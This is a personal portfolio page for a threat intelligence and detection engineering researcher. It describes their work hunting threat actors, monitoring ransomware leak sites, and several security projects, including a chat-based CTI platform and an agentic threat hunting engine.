01 / About
Security researcher and builder. I run detection engineering and threat intelligence operations for enterprise clients — hunting active threat actors, monitoring dark web infrastructure, and building the tooling that makes all of it faster.
On any given day: tracking a ransomware group's leak site, writing detection logic for a new attack chain hitting Indian enterprises, automating what used to take an analyst hours, or shipping a new security product.
I study adversary tradecraft from primary sources — actor forums, real campaigns, leaked tooling — because understanding how attacks are built is what makes detections that actually hold up.
02 / Capabilities
Hypothesis-driven hunting across enterprise SIEM environments. Building detection logic from scratch against real attack chains — not from template rules. Every hunt starts with an adversary behavior, not a vendor alert.
Reading adversary tradecraft from primary sources — actor forums, real campaigns, leaked tooling. Understanding how attacks are actually built so detections don't fail the moment the playbook deviates.
Applying LLMs practically to security workflows — alert triage, threat brief authoring, hunt query generation. Shipped THREATPULSE, a chat-based CTI platform, and HuntWire, an agentic threat hunting engine that runs continuous autonomous hunts across the environment.
Continuous monitoring of ransomware leak sites, actor forums, and paste infrastructure. Tracking victim disclosures, new group activity, and infrastructure changes before they surface in public feeds. Built tooling to do this at scale.
Technical Stack
Detection & Hunting
Development
Intelligence
03 / Projects
Real-time dark web threat monitoring platform.
Continuous monitoring across ransomware leak sites, actor forums, and paste infrastructure. Tracks new victim disclosures, group activity spikes, and infrastructure pivots — before they surface anywhere else. Built the full data pipeline from scratch: collection, deduplication, normalisation, and a client reporting layer.
Chat-based cyber threat intelligence platform.
Chat-based threat intelligence platform. Feed it an actor name, a domain, a hash — it enriches across live intel sources and generates hunt queries for every major SIEM simultaneously. Presented publicly at the NullU Delhi Chapter meetup.
Agentic threat hunting engine.
Doesn't wait for alerts. Runs continuous, autonomous hunting cycles across the environment — forming hypotheses, querying the SIEM, correlating findings across log sources, and surfacing threats that would never trip a rule. Built to do in minutes what a manual hunt takes hours to run.
Active Directory security assessment platform.
Active Directory security assessment platform for enterprise environments. Orchestrates auditing via an authenticated agent, consolidates findings by risk category, and generates client-ready reports — replacing what used to be a manual multi-tool process.
Passive infrastructure reconnaissance and actor mapping toolkit.
Passive infrastructure reconnaissance toolkit. Maps exposed services, certificate history, and subdomain relationships to known threat actor targeting patterns. Used operationally to build actor infrastructure profiles and identify pivot points before engagement.
Security infrastructure product.
Architecture complete. Building quietly — the idea is too sharp to surface yet.
Consumer product.
Building quietly.
Public Talk
Presented THREATPULSE — a live demo of a chat-based CTI platform enriching indicators in real time and generating hunt queries across multiple SIEM platforms simultaneously. First public talk at a security community meetup.
Currently: Building detection logic for advanced phishing and identity-based attack chains in enterprise environments. Writing monthly threat intelligence briefs for Indian enterprise clients covering active threat actor activity, emerging TTPs, and recommended defensive posture.
04 / Contact
Security work, product collaborations, intelligence engagements — or just to talk tradecraft.